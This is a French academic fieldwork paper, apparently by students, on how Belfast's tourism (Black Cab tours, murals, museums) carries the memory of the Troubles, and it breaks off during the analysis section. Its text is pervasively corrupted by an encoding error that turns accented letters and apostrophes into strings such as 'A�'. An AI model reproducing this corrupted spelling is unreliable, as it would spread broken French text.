Le rA?le de la��offre touristique belfastoise dans la perpA�tuation de la mA�moire des « Troubles »

ParA�Emilie Guibert et Valentina Ferreira GutiA�rrez

1. Introduction

1.1A� Contexte

La��Irlande du Nord fut le thA�A?tre da��intenses conflits entre le 5 octobre 1968 – date de la Civil Right March A� Derry – et le 10 avril 1998 a�� date qui marque la��Accord du Vendredi Saint[1]. Ces derniers ont opposA� les rA�publicains, militant pour le ralliement A� la��Irlande, et les loyalistes, fidA?les A� la couronne da��Angleterre. La plupart des affrontements civils se sont dA�roulA�s A� Belfast, ville considA�rA�e comme A�tant la A� miniature urbaine du conflit national A� (Ballif, 2012, p.116). Ce contexte da��affrontements na��A�tait pas propice au dA�veloppement touristique de la capitale qui pA?tit durant de longues annA�es des images de violence et de sA�grA�gation diffusA�es A� travers le monde. En effet, dA?s 1969, on assiste A� la construction da��un mur, dit A�A�de la paixA�A�, sA�parant physiquement les communautA�s catholiques et protestantes. La pA�riode des Troubles contribua au dA�veloppement da��un imaginaire touristique associant Belfast A� la��instabilitA� et A� la��incomprA�hension culturelle (Morand, 2009), ce qui explique le fait que la��Irlande du Nord na��ait pas A�tA� privilA�giA�e en tant que destination touristique durant prA?s de trente ans. Cependant, la��accord de paix de 1998 marque le dA�but de la��expansion da��un nouveau tourisme en Irlande du Nord. Depuis, les compagnies aA�riennes desservent A� nouveau la capitale rA�gionale et le nombre de visiteurs serait passA� de 1.6 millions en 1999 A� 6.8 millions en 2006 (Morand, 2009, p.39). Les moteurs du dA�veloppement de ce nouveau tourisme sont multiples: da��une part, le gouvernement nord-irlandais sa��est servi de cet instrument afin de diversifier ses ressources A�conomiques (Legrand, 2002); da��autre part, cette ouverture au tourisme a contribuA� au renouvellement de la��image de la ville (Ballif, 2012). Dans le cadre de cette politique touristique, des espaces urbains et les traces du conflit sont A� mis en tourisme A� afin de susciter la��intA�rA?t des touristes tout en perpA�tuant la mA�moire de ce dernier.

Aujourda��hui, Belfast fait partie des destinations nouvellement A� rA�-ouvertes A� au tourisme (Morand, 2009) : les traces matA�rielles des Troubles ont A�tA� patrimonialisA�es et sont exploitA�es en tant que ressources touristiques par des acteurs privA�s et publics (Naef, 2013). Ce patrimoine qui comprend les murals, symboles de la lutte entre deux communautA�s (Ballif, 2014) et tA�moignages de la guerre civile, sont trA?s prisA�s par les visiteurs. Ceux-ci sont mentionnA�s dans les guides touristiques comme A�tant des A�hauts-lieux de la ville A� (Ballif, 2012, p.118), de par leur reprA�sentativitA� de la��histoire de Belfast. Dans le cadre de notre travail, nous les considA�rerons comme A�tant des supports de mA�moire, car les discours les accompagnant sont souvent porteurs da��expA�riences personnelles. On le verra par la suite, les acteurs touristiques ont tendance A� mettre en scA?ne leur vA�cu lorsqua��ils font visiter certains monuments ou lieux historiques. Mis A� part les murals, il existe da��autres supports de mA�moire dont la nature varie.

Il existe da��une part des symboles matA�riels parmi lesquels figurent des musA�es, A�des mA�moriels ou des quartiers ayant A�tA� touchA�s par les affrontements, comme ceux de Shankill et Falls. Da��autre part, on retrouve aussi des supports de mA�moire immatA�riels et symboliques tels que des tA�moignages oraux. Cependant, malgrA� cette diversitA� de supports, les murals constituent, au vu de ce que nous avons pu observer lors de notre sA�jour, la��A�lA�ment le plus rA�current proposA� par la��offre touristique orientA�e vers la thA�matique des Troubles. Enfin, le fait que les touristes prA?tent une attention grandissante A� la��A�gard de ces sites emblA�matiques du conflit reflA?te, selon nous, leur dA�sir de participer A� la perpA�tuation de la mA�moire de ce dernier (Morand, 2009, p. 45).

1.2 Les concepts relatifs au tourisme mA�moriel

Mener une A�tude dans ce contexte implique de dA�finir au prA�alable certains concepts. Nous tirerons de la littA�rature certaines dA�finitions afin de poser un cadre thA�orique qui nous servira de base pour notre dA�veloppement. Nous dA�finirons donc de maniA?re prA�cise ce que nous entendons lorsque nous mentionnons les notions de mA�moire, lieu de mA�moire, mise en tourisme et tourisme mA�moriel.

Dans sa thA?se, Anne-CA�line Morand reprend les dires de Pierre Morand qui stipule que A�A�(a��) la mA�moire est la vie, toujours portA�e par des groupes vivants et A� ce titre, elle est en A�volution permanente, ouverte A� la dialectique du souvenir et de la��amnA�sie inconsciente de ses dA�formations successives, vulnA�rable A� toutes les utilisations et manipulations, susceptible de longues latences et de soudaines revitalisations.A�A� (Morand, 2009, p.9). La mA�moire sa��oppose donc A� la��histoire dans le sens oA? elle fait rA�fA�rence A� des faits dont il existe encore des tA�moins vivants, crA�ant de ce fait un lien entre les temps chronologiques du prA�sent et du passA�. La mA�moire suppose donc qua��une personne physique soit porteuse de cette derniA?re. Par ailleurs, la mA�moire est sujette A� des transformations au fil de sa transmission contrairement A� la��histoire qui est une reconstruction incomplA?te mais immuable de ce qui na��est plus (Morand, 2009, p.9).

Il existe un lien entre mA�moire et espace, car la mA�moire tend A� sa��incarner dans des lieux ou des reprA�sentations de lieux (Petitier, 1989). De lA� dA�coule la notion de lieu de mA�moire. Selon Jean-Didier Urbain, un lieu de mA�moire na��est pas une destination comme les autres. Elle na��existe pas en soi, mais par un regard spA�cifique. A�Celui qui se souvient transforme un simple lieu en rA�ceptacle da��un passA� toujours vivant dans les mentalitA�s (Urbain, 2003). Le lieu de mA�moire peut A?tre topographique, monumental ou symbolique (Petitier, 1989) mais reste indissociable de celui qui le pense. Tout comme dans la notion de mA�moire explicitA�e ci-dessus, on retrouve, dans la dA�finition du lieu de mA�moire, le lien existant entre ce qui est passA� et ce qui est prA�sent.

Ces lieux peuvent, selon la��expression employA�e par la��Equipe MIT, A?tre mis en tourisme (Equipe MIT, 2000). Cette mise en tourisme consiste en la construction da��une dA�sirabilitA� de ces lieux potentiellement associA�s A� la violence, A� la mort, au deuil, et au sacrifice (Hertzog, 2012). Dans le cas de notre A�tude, les lieux de mA�moire sont construits par les acteurs touristiques comme destinations A�sA�duisantes pour le visiteur. Ce processus tend A� transmettre un message contribuant A� la construction da��une image de la ville censA�e susciter la��intA�rA?t du touriste (Hertzog, 2012).

Enfin, ces lieux de mA�moire sont mis en tourisme dans le cadre da��un tourisme mA�moriel. La dA�finition de ce type particulier de tourisme mentionnA�e par Jean-Didier Urbain est la suivante: A�A la��intA�rieur da��un territoire, il est outil de consolidation da��une unitA� culturelle, da��une construction identitaire, da��une formation des peuples. A la��extA�rieur, pour le visiteur A� la culture da��accueil, il est vecteur de diffusion da��une image, da��une identitA� culturelle A� (Urbain, 2003, p.6). Le tourisme mA�moriel suppose donc un individu porteur da��une mA�moire, qua��il transmettrait A� des fins de crA�ation identitaire et de lutte contre la��oubli. Ca��est un tourisme du passA� sans A?tre un tourisme passA�iste ou nostalgique qui reviendrait A� un simple A� retour aux origines A� (Urbain, A�2003). Il permet de perpA�tuer la mA�moire des A�vA�nements passA�s en les rapatriant dans le prA�sent et en les transmettant A� autrui. Vecteur de conscientisation historique de celui qui en fait la��expA�rience, ce type de tourisme contribue A� la��acceptation du passA� et participe indirectement au maintien de la paix sociale en crA�ant une certaine da��intercomprA�hension culturelle.

Notre cadre thA�orique A�tant dA�fini, nous allons pouvoir passer A� la prA�sentation des enjeux sous-jacents A� notre thA�matique, ainsi qua��A� la problA�matique qua��elle soulA?ve. Au fil de ce travail, nous reviendrons souvent sur ces diffA�rentes dA�finitions.

1.3 ProblA�matique et enjeux

Ca��est dans le cadre de la mise en tourisme da��A�lA�ments relatifs aux Troubles que notre dA�marche sa��inscrit. Dans une ville qui a souffert de violents affrontements, les murals, les mA�moriels et certains quartiers constituent des preuves matA�rielles des A�vA�nements passA�s. Il sera question ici de comprendre comment le tourisme belfastois cherche A� faire connaA�tre la��histoire des Troubles aux visiteurs. Notre travail consistera en une analyse de la��offre touristique A� travers la perspective du tourisme mA�moriel, ou tourisme de mA�moire. Comme mentionnA� ci-dessus, ce type de tourisme A� vocation pA�dagogique fait rA�fA�rence A� un phA�nomA?ne ancien ayant dA�butA� avec la PremiA?re Guerre Mondiale, et qui a contribuA� dA?s les annA�es 1990 A� la production da��un imaginaire touristique (Hertzog, 2012). Dans ce contexte, les traces de guerre deviennent une ressource mobilisA�e par les acteurs de la��offre touristique. Nous analyserons donc comment ces derniers font appel A� la mA�moire du conflit ayant sA�vi entre 1969 et 1998 en A�tudiant la mise en tourisme des murals et des autres A�lA�ments porteurs de mA�moire.

A� travers notre approche mA�morielle de la��offre touristique belfastoise, nous pouvons voir A�merger deux enjeux. PremiA?rement, on constate que les discours da��anciens prisonniers politiques et da��autres personnes ayant vA�cu ou participA� au conflit sont mobilisA�s par la��industrie touristique. Da��une part, nous pouvons penser que cette mise en scA?ne sa��inscrit dans une logique de recherche de profit, car les touristes ont tendance A� A?tre attirA�s par les anecdotes personnelles. De ce fait, cette tendance peut A?tre instrumentalisA�e A� des fins A�conomiques. Da��autre part, la mise en scA?ne de discours peut A�galement rA�pondre A� la volontA� de transmettre A� autrui la mA�moire des A�vA�nements passA�s. Dans le cadre de notre thA�matique, nous allons plutA?t nous pencher sur ce second aspect car il peut A?tre mA� par un enjeu de sensibilisation. Lorsque nous avons rencontrA� un conducteur de Black Cab, nous lui avons posA� des questions sur les motivations qui la��ont poussA� A� devenir guide touristique. Ce dernier nous a alors rA�pondu qua��il A�tait nA�cessaire que les individus soient conscients de la gravitA� de la situation ayant sA�vi A� Belfast. De ce fait, il est selon lui primordial de sensibiliser le visiteur par le biais de la transmission da��expA�rience personnelle. De maniA?re gA�nA�rale, il sa��agit donc de faire comprendre aux touristes pourquoi les A�vA?nements se sont dA�roulA�s ainsi, en explicitant les raisons qui ont poussA� les acteurs prA�sents A� la��A�poque A� agir de la sorte. Plus qua��une justification de leurs actes, ces expA�riences personnelles sont mobilisA�es dans le but de sensibiliser les touristes A� la situation locale afin que ces derniers assimilent au mieux la mA�moire du conflit.

DeuxiA?mement, nous avons dA�celA� un enjeu pA�dagogique lors de notre analyse de la��offre touristique. On peut considA�rer que les acteurs de ce milieu ont pour but da��instruire le visiteur dans le cadre da��un tourisme mA�moriel. Outre le fait da��inculquer certaines connaissances historiques, une des raisons de la vocation pA�dagogique de ce type de tourisme peut A?tre, selon nous, de promouvoir la��intercomprA�hension culturelle. En effet, nous pensons que le fait de transmettre la��histoire du conflit A� autrui par le biais du tourisme mA�moriel peut engendrer plus de rA�ceptivitA�, permettant une meilleure assimilation des A�lA�ments historico-culturels locaux. Ce tourisme pA�dagogique conduit donc celui qui en fait la��expA�rience A� adopter une attitude plus critique envers la situation belfastoise et envers lui-mA?me, A� condition que celui-ci effectue un travail de distanciation et ne considA?re pas chaque rA�cit personnel comme A�tant la seule et unique version des A�vA�nements passA�s.

1.4 Question de recherche et hypothA?ses

AprA?s avoir A�tabli le contexte ainsi que les enjeux de notre thA�matique, nous allons dA�finir notre question de recherche. On observe dans la��offre touristique de la capitale rA�gionale une volontA� de mettre en avant son identitA� ainsi que la maniA?re dont la population a vA�cu le conflit. Ce processus sa��opA?re A� travers la prA�sentation de la mA�moire belfastoise aux touristes (Morand, 2009, p.56). La��offre touristique actuelle diffA?re beaucoup de celle qui a directement fait suite A� la pA�riode des Troubles. Peu de temps aprA?s la��Accord de Paix de 1998, il sa��agissait de faire oublier ce sombre A�pisode a�� ca��est da��ailleurs ce que certains prestataires publics continuent de faire, pour des raisons de neutralitA�, ou dans la��espoir de donner une meilleure image de la ville.

Cependant, la mA�moire du conflit est aujourda��hui mise en avant par divers prestataires, notamment par des agences touristiques privA�es. Ces derniers proposent diffA�rents types de circuits, appelA�s Political Tours (Morand, 2009, p.63). Ca��est dans le cadre de la mise en scA?ne de la mA�moire par la��offre touristique que rA�side tout la��intA�rA?t de notre travail. La question A� laquelle nous allons tenter de rA�pondre sera donc la suivante:

Comment la��offre touristique belfastoise inclut-elle le touriste A� la production de mA�moire? Comment la��espace est mobilisA� par la��offre touristique belfastoise dans le cadre de la territorialisation de la mA�moire?

Trois hypothA?ses dA�coulent de ces deux questionnements. Celles-ci nous aideront A� orienter nos recherches.

H1: Les acteurs de la��offre touristique mettent en scA?ne des rA�cits personnels dans le cadre de visites interactives qui stimulent la co-construction de mA�moire.

A travers le concept de A�A�rA�cits personnelsA�A�, nous entendons toutes les expA�riences vA�cues et les tA�moignages du conflit mis en avant par la��offre touristique. De maniA?re gA�nA�rale, nous nous attendons A� faire la��expA�rience de visites touristiques interactives, durant lesquelles notre opinion et notre ressenti sont sollicitA�s. En ce qui concerne les prospectus touristiques des agences locales, nous pensons y retrouver des expressions faisant allusion A� un retour dans le temps, ou nous proposant une certaine immersion dans la��A�poque des Troubles, ce qui aurait pour but la stimulation de la co-construction de mA�moire.

Lors des Political Tours, nous nous attendons A� A?tre plongA�es dans le vA�cu trA?s personnel des guides touristiques ayant participA� A� la pA�riode des Troubles. Ainsi, cela nous aidera A� nous rapprocher de ces derniers et A� dA�velopper une certaine empathie envers eux. Ce processus conduit A� un glissement entre la position de chercheur et celle de touriste, ce qui peut potentiellement biaiser la validitA� de nos rA�sultats. Cependant, nous effectuerons un travail de distanciation et da��objectivation lors du traitement de notre matA�riau da��analyse, bien que la��objectivitA� totale constitue un objectif inatteignable.

H2: La��offre touristique met en place des circuits pA�dagogiques qui amA?nent le visiteur A� participer activement A� la perpA�tuation de la mA�moire du conflit.

Lors des visites touristiques, nous nous attendons A� A?tre instruites sur la��histoire des Troubles. De ce fait, nous espA�rons qua��A� la fin de notre sA�jour A� Belfast, nous disposerons de tous les A�lA�ments nA�cessaires pour nous forger notre propre opinion A� la��A�gard de cette pA�riode. Le fait da��avoir assimilA� en profondeur les A�vA�nements ayant sA�vi durant les Troubles nous permettra peut-A?tre da��A?tre capables de transmettre ce savoir acquis A� autrui, ce qui fera de nous des personnes actives dans la perpA�tuation de la mA�moire de la��histoire belfastoise.

H3: Il existe un processus de territorialisation de la mA�moire en certains lieux spA�cifiques.

Finalement avec cette derniA?re hypothA?se, nous nous attendons A� voir une rA�partition et/ou une territorialisation de la mA�moire en certains lieux ou secteurs spA�cifique de la ville. La territorialisation de la mA�moire conduit la��individu A� associer un souvenir A� un certain lieu, elle peut donc A?tre exploitA�e A� des fins touristiques.

2. MA�thodologie

Nous allons A� prA�sent tenter de rA�pondre A� nos questions de recherche par le biais de la vA�rification de nos hypothA?ses sur le terrain. Pour ce faire, nous analyserons les modalitA�s de la��offre touristique belfastoise qui tendent A� inclure le visiteur A� la production mA�morielle.

Nos expA�riences touristiques A� Belfast furent nombreuses et nous avons sA�lectionnA� celles qui avaient trait A� notre thA�matique, A� savoir : la visite guidA�e de la Linen Library et des archives du conflit, un City Tour en bus proposA� par la compagnie privA�e Belfast City Sightseeing open top Bus tour, la dA�couverte des quartiers de Falls et Shankill en Black Cab, la visite du Centre Culturel GaA�lique, et enfin les visites de la��Ulster Museum ainsi que celle du Loyalist Museum a�� Andy Tyrie Interpretive Centre accompagnA�e da��un tour dans le quartier de East Belfast. Parmi les acteurs touristiques que nous avons analysA�s, certains sont donc issus de compagnies publiques, et da��autres de compagnies privA�es. Comme nous na��avons pas toujours A�tA� en mesure de savoir si les acteurs touristiques rencontrA�s A�taient issus du domaine public ou du privA�, nous avons dA�cidA� de ne pas attacher trop da��importance A� cette distinction.

Aussi, nous sommes conscientes que cette liste est non-exhaustive et que notre regard sur ces visites a potentiellement A�tA� biaisA� par nos objectifs de recherche. Notre statut de chercheuses nous inclut dans une certaine catA�gorie de touriste, A� savoir, celle des individus intA�ressA�s par la dimension pA�dagogique et la dA�marche scientifique dans la visite da��un lieu (Crahay, 2014). De ce fait, nous nous trouvons dans une position intermA�diaire entre celle du touriste et celle du chercheur scientifique. Cette situation na��est pas sans consA�quence.

Da��un cA?tA�, nous aurons tendance A� nous A�loigner de la position de touriste, car nous aurons peut-A?tre un point de vue plus critique que ces derniers. En effet, contrairement aux touristes en recherche de divertissement, nous vivrons ces expA�riences en restant focalisA�es sur nos objectifs de recherche.

De la��autre, nous na��adopterons pas totalement la posture da��un chercheur scientifique du fait que nous baserons notre analyse sur notre ressenti. De ce fait, nous serons nous-mA?mes objets de notre recherche, ce qui pourrait altA�rer la validitA� de nos conclusions.

Dans le cadre de nos deux premiA?res hypothA?ses, le fait da��A?tre A� la fois chercheuses et objet de recherche biaisera la��interprA�tation de nos rA�sultats, et nous posera problA?me lorsqua��il sa��agira de vA�rifier la��interactivitA� des visites et leur aspect pA�dagogique. En effet, afin de neutraliser la��effet de ce glissement, il nous aurait fallu interroger da��autres touristes ayant participA� aux mA?mes visites, et A�ventuellement effectuer une observation participante afin que notre matA�riel da��analyse soit plus reprA�sentatif. Malheureusement, nous na��avons pas A�tA� en mesure de mener A� bien ces dA�marches, faute de temps et de moyens.

Plus concrA?tement, afin de rA�pondre A� nos questions de recherche, nous avons A�tA� trA?s attentives A� la faA�on dont les murals et les autres A�lA�ments ayant trait au conflit sont prA�sentA�s lors des visites. De ce fait, nous avons analysA� comment les agences proposent de nous A�A�faire visiterA�A� la ville. Ensuite, nous avons rA�coltA� un maximum de matA�riel publicitaire A� analyser, comme des prospectus et des affiches touristiques. Nous avons par ailleurs demandA� conseil A� un office de tourisme ainsi qua��A� la rA�ception de notre auberge, dans le but de voir le type de visites proposA�. En analysant ces documents, nous avons tentA� de repA�rer des slogans-types invitant le visiteur A� sa��immiscer dans la��atmosphA?re des Troubles.

Enfin, un carnet de terrain nous a A�tA� essentiel. Lors des visites guidA�es, nous avons relevA� les A�lA�ments qui A�taient pour nous susceptibles da��inclure le visiteur A� la perpA�tuation de la mA�moire du conflit. En effet, au niveau de la��offre touristique, les visites ayant pour thA�matique le conflit nord-irlandais et tendant A� inclure le visiteur A� la production de mA�moire se dA�clinent en plusieurs modalitA�s, notamment la mise en scA?ne de rA�cits personnels et la valorisation de circuits pA�dagogiques. Par exemple, les Black Cabs proposent au visiteur de faire un tour de la ville. Souvent, le chauffeur est un ancien prisonnier politique qui raconte A�les A�vA�nements passA�s selon son appartenance religieuse, ce qui fait que le touriste prendra connaissance de la ville A� travers les yeux da��un protestant ou da��un catholique (Lisle, 2006). La��intA�rA?t de ce genre de visite sera de voir en quoi ce processus nous implique dans la co-construction de mA�moire.

3. ElA�ments da��analyse

3.1 Deux modalitA�s touristiques fonctionnant dans un cadre interactif

3.1.1 La mise en scA?ne de rA�cits personnels

a) Un tourisme informatif et historique

Parmi nos diverses expA�riences, deux da��entre elles ne nous permettent pas da��affirmer la��hypothA?se selon laquelle la��offre touristique met en scA?ne des rA�cits personnels dans le cadre du tourisme mA�moriel. La premiA?re visite durant laquelle nous na��avons relevA� que trA?s peu da��A�lA�ments relatifs aux Troubles est celle du City Hall. Aucun rA�cit personnel na��a A�tA� mis en avant par notre guide qui nous a prA�sentA� une vision relativement institutionnelle de la��histoire de la ville. La seconde visite durant laquelle la��interaction et la mise en scA?ne de rA�cits personnels na��est pas de mise est celle proposA�e par les Belfast City Sightseeing open top Bus tour : lors de cette visite, les informations A�taient transmises de maniA?re impersonnelle. Cette impression peut A?tre due au fait que cette compagnie, bien que privA�e, possA?de une licence du dA�partement de la��environnement qui les oblige A� rester neutre. Proposer des rA�cits personnels pourrait paraA�tre trop partial pour ce genre de visite. Selon nous, ces deux visites ne sa��inscrivent pas dans le cadre da��un tourisme mA�moriel mais plutA?t dans celui da��un A� tourisme informatif A� ou A� historique A�.

b) Des rA�cits personnels dA�guisA�s?

Nos impressions sont plus mitigA�es quant A� la visite du Loyalist Museum et du quartier de East Belfast: nos deux guides na��ont pas mis leurs propres expA�riences en avant et na��ont que trA?s peu parlA� da��eux. Cependant, nous avons senti dans leur discours que ces derniers ont A�tA� impliquA�s da��une maniA?re ou da��une autre dans le conflit, car ils utilisaient le pronom personnel A� nous A� lorsqua��ils nous prA�sentaient les actions armA�es perpA�trA�es par les groupes protestants (UFF, UDA, UYM)[2]. Aussi, la tension A�tait palpable lorsqua��ils nous parlaient des victimes loyalistes et nous prA�sentaient les nombreux mA�moriels protestants. MA?me si cette visite na��a pas A�tA� des plus interactive et que nous na��avons dA�celA�, a priori, aucun rA�cit personnel, sa neutralitA� na��a pas A�tA� totale: selon nous, le fait de prA�senter les forces protestantes comme A�tant de A� bons justiciers A�, peut avoir pour finalitA� de nous rallier A� leur cause. Nous pouvons donc considA�rer cela comme une invitation A� la perpA�tuation de A�A�leurA�A� mA�moire du conflit. En effet, nos deux guides nous ont expliquA� avoir crA�A� ce musA�e en rA�action au succA?s des Black Cabs, majoritairement catholiques, afin de pouvoir, eux aussi, perpA�trer leur version de la��histoire.

Enfin, trois visites nous permettent de vA�rifier la��hypothA?se selon laquelle la��offre touristique met en place des rA�cits personnels dans le but de perpA�tuer la mA�moire du conflit.

c) Un rA�el partage da��expA�riences de vie ?

Dans un premier temps, la partie archive de la Linen Library fut trA?s intA�ressante. Au dA�but, notre guide sa��est attardA� sur un grand livre datant de 1969 qui recense la population de Belfast de la��A�poque ainsi que les rues prA�sentes A� cette date. Ce dernier lui rappelle son enfance, car certains endroits qua��il apprA�ciait A�tant enfant ont A�tA� dA�truits durant les Troubles. En tant que support de mA�moire, ce registre dans lequel figure son grand-pA?re confA?re A� notre guide le statut de mA�diateur : par le biais de ce dernier, il nous a transmis A� la fois la mA�moire de son grand-pA?re, la sienne, mais aussi celle de la gA�ographie passA�e de la ville. Ensuite, des rA�cits personnels ont A�tA� mis en scA?ne par le biais de divers supports: par exemple, on trouve dans ce musA�e des lettres A�crites, durant le conflit, par da��anciens prisonniers en grA?ve de la faim sur du papier toilette ou du papier A� cigarette. Ces derniers, ayant la��interdiction de communiquer avec la��extA�rieur, sa��en servaient pour donner des nouvelles A� leur famille par la��intermA�diaire des prA?tres. Cette fonction a aujourda��hui laissA� la place A� celle de la transmission de mA�moire : en tant que touriste, nous avons eu la��opportunitA� de lire ces rA�cits personnels, et donc de sa��imprA�gner, la��espace da��un instant, du souvenir de quelques individus. Cependant, notre rA?le dans la co-construction et la perpA�tuation de leur mA�moire se limite A� nous remA�morer ces A�crits, car notre capacitA� de retransmission de cette mA�moire est limitA�e, entre autres par la��interdiction de les photographier.

Ensuite, bien qua��une grande partie de la��Ulster Museum relative aux Troubles soit constituA�e da��informations objectives et de faits historiques irrA�futables prA�sentA�s de maniA?re unilatA�rale, nous avons dA�couvert grA?ce A� la��un de nos camarade une petite section portant sur des tA�moignages audio du conflit. Cette partie du musA�e, regrettablement peu mise en valeur, nous a permis de nous plonger dans le vA�cu des individus. La partie BBC Legacy de cette plateforme fut trA?s intA�ressante dans le cadre de notre travail, car la prA�sentation des rA�cits personnels y est faite da��une maniA?re telle qua��elle est accessible A� tout un chacun : en effet, il na��est pas nA�cessaire da��avoir certaines connaissances scientifiques ou historiques prA�alables pour A?tre touchA� par ces commentaires et la mA�moire du narrateur nous parvient mA?me si ce dernier ne se trouve pas en face de nous. Par exemple, parmi les rA�cits partisans figure la��histoire da��un homme loyaliste, dont la famille A�tait trA?s impliquA�e dans le conflit. Ce dernier conte les raisons de son attitude critique envers les actes de sa famille et nous explique qua��il a dA�cidA� de sa��en A�carter avec sa sA�ur.

Un autre tA�moignage que nous avons entendu est celui da��une femme catholique racontant son enfance perdue, sa mA?re ayant A�tA� assassinA�e durant les Troubles lorsqua��elle avait neuf ans. Da��autres rA�cits purement personnels qui ne mentionnent pas la position de la��individu dans le conflit sont proposA�s, comme celui da��une femme touchA�e par balle A� la jambe alors qua��elle A�tait enceinte de trois mois. Cette derniA?re nous fait part de ses prA�occupations et angoisses du moment en nous affirmant que mA?me si elle et son enfant ont survA�cu, ce traumatisme la hantera A� vie.

Ces tA�moignages ont eu pour effet de nous plonger directement dans la��atmosphA?re du conflit. MA?me si cette expA�rience na��A�tait pas interactive, nous sommes aujourda��hui porteuses de la mA�moire de ces personnes.

Enfin, une derniA?re expA�rience qui nous permet da��affirmer notre premiA?re hypothA?se est celle de la visite des quartiers de Shankill et Falls en Black Cab. Une citation issue du flyer de la compagnie TaxiTrax illustre bien la��idA�e de transmission de mA�moire par le biais da��expA�riences personnelles: A�A�All of our drivers are highly experienced with a wealth of personal knowledge, guaranteeing your trip to be something you will always remember. (a��) [A]s your driver shares a little personal anecdote, you can be sure that you will have seen the real Belfast (a��)A�A�. En effet, au vu de notre expA�rience dans ces taxis nous pouvons affirmer la vA�racitA� de cette citation : premiA?rement, cette visite nous a vA�ritablement permis de nous projeter dans la pA�riode des Troubles, car la mise en rA�cit y est trA?s valorisA�e. Tout au long de cette escapade en voiture, notre chauffeur nous faisait part des histoires qua��il avait vA�cu durant le conflit. Par exemple, lorsque nous lisions les noms des dA�funts mentionnA�s sur les mA�moriels, il nous avouait que certains da��entre eux faisaient partie de ses amis. Aussi, ayant A�tA� lui-mA?me prisonnier politique, cela rendait son discours da��autant plus poignant et nous avons vraiment A�tA� touchA�es par ce qua��il nous a confiA�. Lorsque nous lui avons demandA� pourquoi il avait voulu exercer cette profession, ce dernier nous a simplement rA�pondu : A�A�I want to put a face on the situation and humanize the warA�A�. Suite A� cela, il nous a affirmA� qua��il prA�fA�rait raconter lui-mA?me sa perception du conflit plutA?t qua��elle soit transmise par le biais da��un livre da��histoire, car les gens sont plus rA�ceptifs lorsqua��une personne parle elle-mA?me de son histoire. En effet, la mise en scA?ne de son vA�cu personnel nous a poussA� A� ressentir de la compassion et nous a conduit A� une meilleure comprA�hension de sa position. Cet effet a A�tA� renforcA� par le fait que la visite A�tait interactive : notre conducteur rA�pondait volontiers A� toutes nos questions, mA?me si ces derniA?res A�taient parfois intimes. En discutant avec lui, nous avons eu la��impression de participer A� la co-construction de la mA�moire des Troubles, car nous pouvons dire qua��A� prA�sent, nous avons acquis une infime partie de la sienne.

Au vu de ces expA�riences touristiques, nous pouvons affirmer que la��une des modalitA�s de la��offre touristique belfastoise qui contribue A� la perpA�tuation de la mA�moire du conflit est la mise en scA?ne de rA�cits personnels dans une perspective interactive. Bien que cette modalitA� ne soit pas de mise partout, notre visite guidA�e du Loyalist Museum, notre tour en Black Cab, et la visite de la��Ulster Museum ont pour point commun de valoriser la mise en rA�cit dans le but de plonger le visiteur dans la dure rA�alitA� qui a sA�vi A� Belfast entre 1969 et 1998.

3.1.2 La valorisation de circuits pA�dagogiques

a) Une transmission unilatA�rale da��informations

Notre deuxiA?me hypothA?se qui stipule la mise en place de circuits pA�dagogiques stimulant la co-construction de mA�moire se voit rA�futA�e A� plusieurs reprises. PremiA?rement, nous avons trouvA� la visite du City Hall trA?s peu pA�dagogique dans le sens oA? il sa��agissait da��un tourisme oA? la��interaction avec le visiteur A�tait quasi inexistante. Un guide nous a accueilli et nous a prA�sentA� le City Hall en nous donnant beaucoup da��informations sans attendre de rA�flexions trA?s poussA�es de notre part. En effet, la quantitA� de matiA?re transmise par ce dernier A�tait telle qua��il nous A�tait difficile de rebondir sur ces informations. Le seul moment interactif dA�celA� lors de cette visite fut le moment oA? nous nous sommes assises sur la chaise du maire. Toutefois, nous ne pouvons qualifier cet A�pisode de pA�dagogique, mais uniquement da��interactif, car il ne nous a pas permis de comprendre pour autant le fonctionnement du systA?me politique belfastois.

Nous avons ressenti le mA?me manque de pA�dagogie lors du Belfast City Sightseeing open top Bus. Sur leur flyer, le fait de visiter les murals les plus cA�lA?bres de Belfast et de parcourir de long en large le Peacewall A�tait prA�sentA� comme un point fort de la compagnie. Cependant, ceci na��a A�tA� en fait qua��une infime partie de ce que le tour propose, et les informations relatives A� la thA�matique des Troubles se sont retrouvA�es noyA�es dans une masse d’informations, notamment relatives A� la��histoire du Titanic. Si nous A�tions des touristes en recherche da��un survol de la ville, cette visite aurait A�tA� amplement suffisante. Or, en tant que chercheuses nous avons trouvA� cette visite trA?s superficielle, ce qui nous a empA?chA� da��en saisir le fil conducteur. Ainsi, nous avons eu la��impression da��A?tre de simples spectatrices du fait que nous na��avons pas eu la��opportunitA� de manifester notre comprA�hension et/ou incomprA�hension des informations qui nous A�taient donnA�es.

Puis, nous avons jugA� important de visiter le musA�e officiel de la ville afin da��avoir un avis neutre sur le conflit. Nous nous sommes donc rendues A� la��Ulster Museum oA? nous avons pu explorer la section dA�diA�e aux Troubles. Loin da��A?tre inintA�ressante, cette exposition parle da��elle-mA?me, ca��est pourquoi elle ne nA�cessite pas la prA�sence da��un guide. Il sa��agit da��un espace oA? sont disposA�s des murs avec du texte et des images qui retracent la��histoire du conflit. Une fois encore, nous avons eu affaire A� une transmission unilatA�rale da��informations, sans interaction entre le visiteur et la��acteur de la��offre touristique. Nous na��avons dA�celA� aucun moyen pour le touriste de participer A� cette co-construction de mA�moire, par le biais de rA�flexions qui conduiraient le prestataire A� modifier son offre par rapport aux attentes du public. En ce qui concerne la plateforme des tA�moignages mentionnA�e dans notre premiA?re hypothA?se, elle est A�galement composA�e da��une partie nommA�e CAIN Web Service qui comprend des sources scientifiques et des articles divers A� propos du conflit. Cependant, mA?me si cette partie participe en quelque sorte A� la��assimilation de la mA�moire par le touriste, nous avons trouvA� cette derniA?re trA?s acadA�mique et peu accessible A� tout un chacun. En effet, il sa��agit da��articles scientifiques qui nA�cessitent une certaine connaissance prA�alable pour assurer leur comprA�hension. Ceci nous laisse penser que cette rubrique est plutA?t dirigA�e vers des chercheurs en quA?te da��informations prA�cises. Ainsi, cela contribue A� discriminer les individus disposant de peu de capital culturel dans le processus de perpA�tuation de la mA�moire.

